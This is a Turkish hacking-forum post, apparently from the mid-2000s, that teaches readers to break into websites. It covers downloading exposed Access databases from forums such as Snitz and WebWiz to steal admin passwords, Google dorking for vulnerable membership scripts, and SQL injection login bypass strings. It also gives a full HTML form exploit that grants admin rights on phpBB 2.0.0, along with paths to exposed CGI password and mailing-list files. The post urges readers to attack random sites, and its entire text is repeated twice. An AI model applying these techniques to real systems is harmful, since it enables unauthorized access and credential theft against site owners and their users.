blackwolf
uid=0(root)
- Katılım
- 17 Ağu 2005
- Mesajlar
- 1,429
- Reaction score
- 0
- Puanları
- 0
- Yaş
- 35
AçikLar.
BeLkide üstünde sayfaLar yaziLabiLecekk böLüm..
Php asp sistemLerin birçok açigi warr.
ASP:
Çok kuLLaniLan webwiz we snitz forumLari (binLerce)
HackLemek çok basit..
snitz forumLari - snitz_forums_2000.mdb
Webwiz forumLari - /admin/wwforum.mdb bu sekIlde main database e uLasip admin sifrelerini accessLe weya baska bir msb browserLa açarak buLabiLirsinizz..Sonra forum sizin emrinizde..
Asp nuke siteLerdede /db/main.mdb denersenizz db Dosyasini buLabiLirsiniz..
*Herhangi bir sitenin mdb si içinse O sitenin üyeLik sistemi portaLini buLarak bunLari aspindir.com dan indirerek db yoLuna bakarsinizz..
BunLar
db/uyelik.mdb /db/members.mdb /db/sifreler.mdb oLabiLir..
Bu sekiLde googLedan aratak rastgeLe sitede hackLeyebiLirsinizz..
Bir mdb buLma yöntemi:
*Asp siteLerde üyeLik sistemLeri site yönetimi için portaLLar geneLLikLe geneL hazir scriptLerden yaziLmistir...
.mdb hackLemek için herkez googLe dan inurl"x.mdb" oLarak aratir..
Simdi benim diyecegi yöntem hiç bi yerde yoq we tamamen benim tarafimdan buyLunmusturr.
www.aspindir.com
www.asparsivi.com
www.maxiasp.com siteLerinden hazir bir üyeLik sistemi indiriyoruzz..
MeseLa xp üyeLik sistemini indirin.
Db yoLuna bakin..
Bakiyoruzz..
/db/uyelik.mdb
Simdi googLe! a girip Xp üyeLik sistemi diye aratinn..
Ewet "xp üyelik sistemi" sekLinde aratiginizda karsiniza onLarca sayfa çikacaktir..
Bu iLk 4 sayfada 20 1ye yakin sitede bu açikTan war.
Çikan sonuçLarin db Lerini indirip accessLe açarsanizz sifreLer eLinizdee..
*SqL Injection
user \'or\' sifre: \'or\' bu sekiLde admin girisi yapabiLirsiniz..
*Php
Php sistemLerinde açigi war..
Php-nuke 5.5 te haber ekLeme açigi weya kuLLanici adi:admin sifre:\'or true\'
GüwenLik açikLari böLümünden sql injection açigina bakarsanizz göreceksiniz..
Phpbb forumLarinda açikLari wardir.MeseLa örnek oLaarak phbb2.0.0 açigi bu forumdan kaLmadi deniLebiLir ama örnek oLsun diye weriyorum.
-------------------------------
<form method="post" action="http://forum sayfasi/admin/admin_ug_auth.php">
<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />
</form>
</body>
</html>
---------------------------------
Bu KoD yeni bir üyeye admin yetkisi werir.
Birda phpbb forumLarin 2.0.3 de db.php açigini duydum..
BuLabiLirsem yayinLarim..
Birde bazi .php dosyalarini çaLarak admin sifreLerine uLasabiLiyorduk.
Sanirim config.php diydi.
Bunu FLashget webzip tarzi programLarLa kendi pcmize yükLeyebiLiyoruz..
*php maiLList açigi
GoogLe dan aratip vuLduunuz php maiLListLerin sonuna /ml_config.dat ekLeyerek admin sifresine uLasabiLirsiniz..
*Cgi script açikLari..
WebBBS Scriptleri
----
WebBBS - Bulletin Board System (Bildiri Tahtasi Sistemi) Bu sistem yukarida size örnekledigim gibi siteye mesaj atmak için kullanilir.
Bu sistem bünyesinde bu bildiri tahtalarina üye kimselerin kullanici adi/sifre kombinasyonlarini bulundurur.Böylelikle istediginiz kisi adina
bildiri tahtasina mesaj gönderebilirsiniz.
Açik : http://www.hedefsite.com/cgi-bin/webBBS/profiles/ ya da http://www.hedefsite.com/cgi-bin/webBBS/users/
WebAdvert Scriptleri (RekLamLar..)
WebAdverts (WebReklam) Bu scriptler sayesinde site yöneticisi sitede aldigi reklamlari yayinlar.Her reklam için ayri hesap vardir.
Bu açigi kullanarak kendi hazirladiginiz bannerlari sitede yayinlayabilirsiniz.Ayrica diger reklam verenlerin hesaplarini silmek ya da bannerlarini
degistirmek elinizde.
Açik : http://www.hedefsite.com/cgi-bin/advert/adpassword.txt --> Sifrelerin bulundugu .txt ..
WWWBoard Scriptleri
wEBBSS ILe ayni sekiLde..
Açik : http://www.hedefsite.com/cgi-bin/wwwebboard.txt
Açik : http://www.hedefsite.com/cgi-bin/wwwboard.txt
Açik : http://www.hedefsite.com/webboard/password.txt
-------------------------
MaillistLer..
-------------------------
Açik : http://www.hedefsite.com/cgi-bin/mailman/addresses.txt
Açik : http://www.hedefsite.com/cgi-bin/maillist/addresses.txt
Açik : http://www.hedefsite.com/cgi-bin/mail/addresses.txt
Açik : http://www.hedefsite.com/cgi-bin/maillist/users.txt
AçikLARI BuLmak..
Scriptler hakkinda genis bilginiz yoksa ve yukarida örnekledigim türden belirli basli açiklari bilmiyorsaniz Cgi Zayiflik Tarayicilarini kullanmanizi öneririm.
Çesitli tarayicilar var bu alanda,bir kismini deniyebilirsiniz.Önemli olan tarayicinin bünyesinde bulundurdugu açik sayisi.Bu çok önemlidir.Bir tarayici bünyesinde
ne kadar çok açik bulundurursa o kadar sansiniz artar.Tarayicinizin güncelleme seçenegi varsa sik sik yenilemenizi öneriririm.Güncelleme seçenegi yoksa birden fazla
tarayici kullanmalisiniz.Unutmamaniz gereken en önemli nokta ise her buldugunuz scripti hackliyemeyeceginiz.
Size daha pratik bir yol daha söyliyeyim,www.arabul.com - www.netbul.com gibi siteler kayitli olan web siteleri içerisinde her türlü kelimeyi arama özelligine sahiptir.Bu
tip arama motorlarina metacrawler denir.Yabanci servis olarak size tavsiyem www.webcrawler.com ya da www.metacrawler.com.
Örnek Aratabileceginiz kelimeler;
cgi-bin
cgi-bin/örnek.pwd
cgi-bin/password.txt
cgi-bin/örnek.cfg
*ExpLoitLer
Eksik oLdugum konu bu fazla biLgim yok buLabiLeceginiz adresLer..
AdresLer:
www.k-otik.com/exploits
www.securityfocus.com gibi adreslerde buLabiLirsiniz
BeLkide üstünde sayfaLar yaziLabiLecekk böLüm..
Php asp sistemLerin birçok açigi warr.
ASP:
Çok kuLLaniLan webwiz we snitz forumLari (binLerce)
HackLemek çok basit..
snitz forumLari - snitz_forums_2000.mdb
Webwiz forumLari - /admin/wwforum.mdb bu sekIlde main database e uLasip admin sifrelerini accessLe weya baska bir msb browserLa açarak buLabiLirsinizz..Sonra forum sizin emrinizde..
Asp nuke siteLerdede /db/main.mdb denersenizz db Dosyasini buLabiLirsiniz..
*Herhangi bir sitenin mdb si içinse O sitenin üyeLik sistemi portaLini buLarak bunLari aspindir.com dan indirerek db yoLuna bakarsinizz..
BunLar
db/uyelik.mdb /db/members.mdb /db/sifreler.mdb oLabiLir..
Bu sekiLde googLedan aratak rastgeLe sitede hackLeyebiLirsinizz..
Bir mdb buLma yöntemi:
*Asp siteLerde üyeLik sistemLeri site yönetimi için portaLLar geneLLikLe geneL hazir scriptLerden yaziLmistir...
.mdb hackLemek için herkez googLe dan inurl"x.mdb" oLarak aratir..
Simdi benim diyecegi yöntem hiç bi yerde yoq we tamamen benim tarafimdan buyLunmusturr.
www.aspindir.com
www.asparsivi.com
www.maxiasp.com siteLerinden hazir bir üyeLik sistemi indiriyoruzz..
MeseLa xp üyeLik sistemini indirin.
Db yoLuna bakin..
Bakiyoruzz..
/db/uyelik.mdb
Simdi googLe! a girip Xp üyeLik sistemi diye aratinn..
Ewet "xp üyelik sistemi" sekLinde aratiginizda karsiniza onLarca sayfa çikacaktir..
Bu iLk 4 sayfada 20 1ye yakin sitede bu açikTan war.
Çikan sonuçLarin db Lerini indirip accessLe açarsanizz sifreLer eLinizdee..
*SqL Injection
user \'or\' sifre: \'or\' bu sekiLde admin girisi yapabiLirsiniz..
*Php
Php sistemLerinde açigi war..
Php-nuke 5.5 te haber ekLeme açigi weya kuLLanici adi:admin sifre:\'or true\'
GüwenLik açikLari böLümünden sql injection açigina bakarsanizz göreceksiniz..
Phpbb forumLarinda açikLari wardir.MeseLa örnek oLaarak phbb2.0.0 açigi bu forumdan kaLmadi deniLebiLir ama örnek oLsun diye weriyorum.
-------------------------------
<form method="post" action="http://forum sayfasi/admin/admin_ug_auth.php">
<p>User Level : <select name="userlevel">
<option value="admin" selected="selected">Administrator</option>
<option value="user">User</option>
</select></p>
<input type="hidden" name="private[1]" value="0" />
<input type="hidden" name="moderator[1]" value="0" />
<input type="hidden" name="mode" value="user" />
<input type="hidden" name="adv" value="" />
User ID: <input type="text" name="u" size="5"> <BR>
<input type="submit" name="submit" value="Submit" class="mainoption" />
<input type="reset" value="Reset" class="liteoption" name="reset" />
</form>
</body>
</html>
---------------------------------
Bu KoD yeni bir üyeye admin yetkisi werir.
Birda phpbb forumLarin 2.0.3 de db.php açigini duydum..
BuLabiLirsem yayinLarim..
Birde bazi .php dosyalarini çaLarak admin sifreLerine uLasabiLiyorduk.
Sanirim config.php diydi.
Bunu FLashget webzip tarzi programLarLa kendi pcmize yükLeyebiLiyoruz..
*php maiLList açigi
GoogLe dan aratip vuLduunuz php maiLListLerin sonuna /ml_config.dat ekLeyerek admin sifresine uLasabiLirsiniz..
*Cgi script açikLari..
WebBBS Scriptleri
----
WebBBS - Bulletin Board System (Bildiri Tahtasi Sistemi) Bu sistem yukarida size örnekledigim gibi siteye mesaj atmak için kullanilir.
Bu sistem bünyesinde bu bildiri tahtalarina üye kimselerin kullanici adi/sifre kombinasyonlarini bulundurur.Böylelikle istediginiz kisi adina
bildiri tahtasina mesaj gönderebilirsiniz.
Açik : http://www.hedefsite.com/cgi-bin/webBBS/profiles/ ya da http://www.hedefsite.com/cgi-bin/webBBS/users/
WebAdvert Scriptleri (RekLamLar..)
WebAdverts (WebReklam) Bu scriptler sayesinde site yöneticisi sitede aldigi reklamlari yayinlar.Her reklam için ayri hesap vardir.
Bu açigi kullanarak kendi hazirladiginiz bannerlari sitede yayinlayabilirsiniz.Ayrica diger reklam verenlerin hesaplarini silmek ya da bannerlarini
degistirmek elinizde.
Açik : http://www.hedefsite.com/cgi-bin/advert/adpassword.txt --> Sifrelerin bulundugu .txt ..
WWWBoard Scriptleri
wEBBSS ILe ayni sekiLde..
Açik : http://www.hedefsite.com/cgi-bin/wwwebboard.txt
Açik : http://www.hedefsite.com/cgi-bin/wwwboard.txt
Açik : http://www.hedefsite.com/webboard/password.txt
-------------------------
MaillistLer..
-------------------------
Açik : http://www.hedefsite.com/cgi-bin/mailman/addresses.txt
Açik : http://www.hedefsite.com/cgi-bin/maillist/addresses.txt
Açik : http://www.hedefsite.com/cgi-bin/mail/addresses.txt
Açik : http://www.hedefsite.com/cgi-bin/maillist/users.txt
AçikLARI BuLmak..
Scriptler hakkinda genis bilginiz yoksa ve yukarida örnekledigim türden belirli basli açiklari bilmiyorsaniz Cgi Zayiflik Tarayicilarini kullanmanizi öneririm.
Çesitli tarayicilar var bu alanda,bir kismini deniyebilirsiniz.Önemli olan tarayicinin bünyesinde bulundurdugu açik sayisi.Bu çok önemlidir.Bir tarayici bünyesinde
ne kadar çok açik bulundurursa o kadar sansiniz artar.Tarayicinizin güncelleme seçenegi varsa sik sik yenilemenizi öneriririm.Güncelleme seçenegi yoksa birden fazla
tarayici kullanmalisiniz.Unutmamaniz gereken en önemli nokta ise her buldugunuz scripti hackliyemeyeceginiz.
Size daha pratik bir yol daha söyliyeyim,www.arabul.com - www.netbul.com gibi siteler kayitli olan web siteleri içerisinde her türlü kelimeyi arama özelligine sahiptir.Bu
tip arama motorlarina metacrawler denir.Yabanci servis olarak size tavsiyem www.webcrawler.com ya da www.metacrawler.com.
Örnek Aratabileceginiz kelimeler;
cgi-bin
cgi-bin/örnek.pwd
cgi-bin/password.txt
cgi-bin/örnek.cfg
*ExpLoitLer
Eksik oLdugum konu bu fazla biLgim yok buLabiLeceginiz adresLer..
AdresLer:
www.k-otik.com/exploits
www.securityfocus.com gibi adreslerde buLabiLirsiniz